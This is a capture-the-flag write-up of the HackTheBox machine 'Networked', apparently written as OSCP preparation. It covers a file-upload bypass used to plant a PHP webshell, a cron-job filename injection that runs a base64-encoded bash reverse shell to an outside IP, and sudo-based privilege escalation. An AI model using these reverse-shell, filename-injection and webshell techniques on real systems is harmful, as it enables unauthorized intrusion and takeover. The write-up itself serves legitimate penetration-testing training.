Road to OSCP 7: Networked HackTheBox
How to use this walkthrough?
To avoid the typical answer on a plate type of walkthrough, I have decided to follow the TryHackMe idea of giving you some hints along the way to help you when you struggle and keep the Try Harder mantra real.
I use Tib3rius’ multi-threaded Autorecon which combines a couple of different tools to enumerate and scan services. It creates a simple file structure and provides you a nice overview of the services scanned.
python3 /opt/AutoRecon/autorecon.py -cs 25 -vv -o /home/kali/Documents/HTB/lab/ 10.10.10.146
While it runs, I usually look at the _quick_tcp_nmap.txt file while we wait for the _full_tcp_nmap.txt
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.4 (protocol 2.0)
| 2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFgr+LYQ5zL9JWnZmjxP7FT1134sJla89HBT+qnqNvJQRHwO7IqPSa5tEWGZYtzQ2BehsEqb/PisrRHlTeatK0X8qrS3tuz+l1nOj3X/wdcgnFXBrhwpRB2spULt2YqRM49aEbm7bRf2pctxuvgeym/pwCghb6nSbdsaCIsoE+X7QwbG0j6ZfoNIJzQkTQY7O+n1tPP8mlwPOShZJP7+NWVf/kiHsgZqVx6xroCp/NYbQTvLWt6VF/V+iZ3tiT7E1JJxJqQ05wiqsnjnFaZPYP+ptTqorUKP4AenZnf9Wan7VrrzVNZGnFlczj/BsxXOYaRe4Q8VK4PwiDbcwliOBd
| 256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAsf1XXvL55L6U7NrCo3XSBTr+zCnnQ+GorAMgUugr3ihPkA+4Tw2LmpBr1syz7Z6PkNyQw6NzC3KwSUy1BOGw8=
| 256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
443/tcp closed https reset ttl 63
There is really only one interesting port here, let’s focus on port 80.
Web server — port 80
We can see in gobuster a couple of interesting URLs
/backup (Status: 301) [Size: 235] /index.php (Status: 200) [Size: 229] /index.php (Status: 200) [Size: 229] /lib.php (Status: 200) [Size: 0] /photos.php (Status: 200) [Size: 1302] /upload.php (Status: 200) [Size: 169] /uploads (Status: 301) [Size: 236]
Let us see what they hold
We have an upload section
A backup of the site
we downloaded the backup and extracted it
tar -xvf backup.tar
lib.php is just a library of functions.
photos.php shows the last 4 uploaded pictures
index.php returns the normal main page
upload.php is the main upload page
/uploads is where the pictures are stored
The path is clear we need to understand what the upload restrictions are and find a way to bypass them so we can upload a PHP webshell or reverse shell.
Can you create a webshell that bypasses those restrictions?
We can see that we need a valid mimetype, stay below 6000Kb and the extension needs to be .jpg, .png, .gif, .jpeg. One of these extensions is just better…
File Upload Attacks- PHP Reverse Shell
So I've been crazy busy, taking the OSCP in 1 week! But I've been working on a lot of stuff, and one of them has been…
Let’s follow the tutorial and upload the webshell with the correct mime type.
We can see in the
photos.php that whatever we upload the upload looks like this “uploaded_by_<IP>.<extension>
Let’s look for our webshell in
Let’s capture the request and worked directly inside Burp
Let’s get a reverse shell now!
Don’t forget to start your listener!
nc -nlvp 4444
We are in!
Time for some shell upgrade 😉
- python -c ‘import pty; pty.spawn(“/bin/bash”)’
- stty raw -echo
- fg (nothing will show on the screen, just type enter after the command a couple of times)
Let’s do some recon!
We find an odd cron job in Guly’s home directory
What is the only thing we actually have influence on in this code.
$value, we can create files inside of the $path (/var/www/html/uploads)and the code will loop through them! It is then used in this beautiful line.
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
The simple idea is to create a file that executes a command that we want to run and we just play it like we’re doing a command injection bypass.
We try to create a file as a reverse shell but there is one constraint that is stopping us, “/” aren’t allowed in filenames.
Can you find a beautiful way to create a reverse shell bypassing ‘/’? What is the beloved technique used by powershell to encode its commands?
Transform them to BASE64!
echo 'bash -c "bash -i >& /dev/tcp/10.10.14.46/6666 0>&1"' | base64 -w0
Now we just need to create the file and wait ❤
Don’t forget the listener!!!
touch ";echo YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xOC83NzcgMD4mMSIK| base64 -d | bash"
We are Guly! Let’s own this server
The way I go about getting root is the following: I’ll look for some quick wins and then run some enumeration scripts to help me find some weaknesses.
sudo -l → sudo permissions
ls -la /opt/ → looking for interesting executables or files
ls -la /var/www/; ls -la /var/www/html → possible configuration files with db pasword or even user password.
ls -la /etc/passwd; ls -la /etc/shadow → misconfigured permissions (write on passwd and read on shadow)
The first one is a charm!
What does that file do?
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
EoFregexp="^[a-zA-Z0-9_\ /-]+$"for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
echo "interface $var:"
while [[ ! $x =~ $regexp ]]; do
echo "wrong input, try again"
echo "interface $var:"
echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
It creates a file and then loops through 4 variables and asks the user to provide their value before writing them to the file.
This was a bit of a trial and error trying to understand how we were supposed to exploit this. After trying for a while, I found that adding a space in our input would execute the second part of the variable.
We own this place!
What did I learn?
- We learned how to bypass upload restrictions with the gif extension
- We learned about embedding code into filenames for execution
- We learned how to spot interesting weaknesses in code and abuse them
Don’t hesitate to join me and struggle together on those machines on my twitch stream Wednesdays and Sundays.